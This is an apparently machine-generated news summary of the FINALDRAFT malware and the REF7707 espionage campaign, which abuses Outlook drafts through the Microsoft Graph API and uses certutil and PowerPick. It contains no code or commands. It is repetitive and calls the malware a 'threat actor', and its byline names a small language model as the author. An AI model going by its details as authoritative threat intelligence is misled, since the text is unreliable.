Ethical Hacking News
A new and sophisticated threat actor, dubbed FINALDRAFT, has been identified as exploiting the Microsoft Graph API for espionage purposes. The campaign, attributed to a threat cluster known as REF7707, has been detected in multiple countries and is characterized by a well-engineered intrusion set that grants remote access to infected hosts. This malware is written in C++ and comes fitted with capabilities to execute additional modules on the fly, abusing the Outlook email service via the Microsoft Graph API for command-and-control purposes.
The FINALDRAFT malware exploits the Microsoft Graph API for espionage purposes. The malware grants remote access to infected hosts and executes PowerShell commands without invoking "powershell.exe". The attackers use a well-engineered intrusion set, including legitimate utilities like PowerPick and certutil, to evade detection. The malware downloads additional payloads from a web server associated with the Foreign Ministry's website using Microsoft's certutil application. The attackers abuse Outlook email service via the Microsoft Graph API for command-and-control purposes. FINALDRAFT is a sophisticated threat actor that uses unique techniques, but poor campaign management and inconsistencies in evasion practices. The discovery of FINALDRAFT highlights the importance of keeping software up-to-date, using robust security measures, and continuous monitoring.
The cybersecurity landscape has recently witnessed a new and sophisticated threat actor, dubbed FINALDRAFT, which has been identified by security researchers as exploiting the Microsoft Graph API for espionage purposes. The campaign, attributed to a threat cluster known as REF7707, has been detected in multiple countries, including an unnamed South American nation, Southeast Asia, and the United States.
The REF7707 campaign is characterized by a well-engineered intrusion set that grants remote access to infected hosts, allowing the attackers to execute PowerShell commands without invoking the "powershell.exe" binary. This evasion technique enables the threat actors to avoid detection by traditional security measures. Furthermore, the malicious code patches several APIs to evade event tracing for Windows (ETW) and launches PowerPick, a legitimate utility that is part of the Empire post-exploitation toolkit.
The malware's behavior involves downloading additional payloads from a web server associated with the foreign ministry's website using Microsoft's certutil application. The certutil commands are executed via the Windows Remote Management's Remote Shell plugin (WinrsHost.exe) from an unknown source system on a connected network, indicating that the attackers already possessed valid network credentials.
The first of the files to be executed is a malware named PATHLOADER that allows for the execution of encrypted shellcode received from an external server. The extracted shellcode, dubbed FINALDRAFT, is subsequently injected into the memory of a newly-spawned "mspaint.exe" process. This malware is written in C++ and comes fitted with capabilities to execute additional modules on the fly.
FINALDRAFT abuses the Outlook email service via the Microsoft Graph API for command-and-control (C2) purposes. The communication mechanism entails parsing the commands stored in the mailbox's drafts folder and writing the results of the execution into new draft emails for each command. This malware registers 37 command handlers that are designed around process injection, file manipulation, and network proxy capabilities.
The use of the Microsoft Graph API by FINALDRAFT is noteworthy, as it has been previously detected in another backdoor named SIESTAGRAPH. However, the way this API is being exploited by FINALDRAFT is unique and highlights the sophistication of the threat actor's techniques.
The REF7707 campaign is characterized by a well-engineered intrusion set that grants remote access to infected hosts. The attackers' use of legitimate utilities such as PowerPick and certutil adds an extra layer of complexity to the attack, making it harder for security researchers to detect and analyze.
In addition, the campaign's poor campaign management and inconsistent evasion practices are noteworthy. While the threat actors have demonstrated a high level of technical expertise, their lack of attention to detail has led to inconsistencies in their techniques, which can be exploited by security researchers.
The REF7707 campaign is attributed to a threat cluster that tracks various malicious campaigns, including one targeting a foreign ministry in an unnamed South American nation. The campaign also targets a telecommunications entity and a university located in Southeast Asia.
The exact initial access vector used in the attacks is currently not clear, although it has been observed that Microsoft's certutil application is used to download additional payloads from a web server associated with the Foreign Ministry. This suggests that the attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment.
The discovery of FINALDRAFT malware highlights the importance of keeping software up-to-date, using robust security measures, and being cautious when interacting with unknown or untrusted sources. Furthermore, it emphasizes the need for continuous monitoring and analysis of network activity to detect and respond to emerging threats.
In conclusion, the REF7707 campaign and the exploitation of the Microsoft Graph API by FINALDRAFT malware represent a significant threat to organizations worldwide. The use of sophisticated techniques, combined with poor campaign management, makes this threat actor a force to be reckoned with in the world of cybersecurity.
Related Information:
https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html
https://cyberinsider.com/new-finaldraft-malware-uses-microsoft-outlook-for-espionage/
Published: Thu Feb 13 04:33:33 2025 by llama3.2 3B Q4_K_M
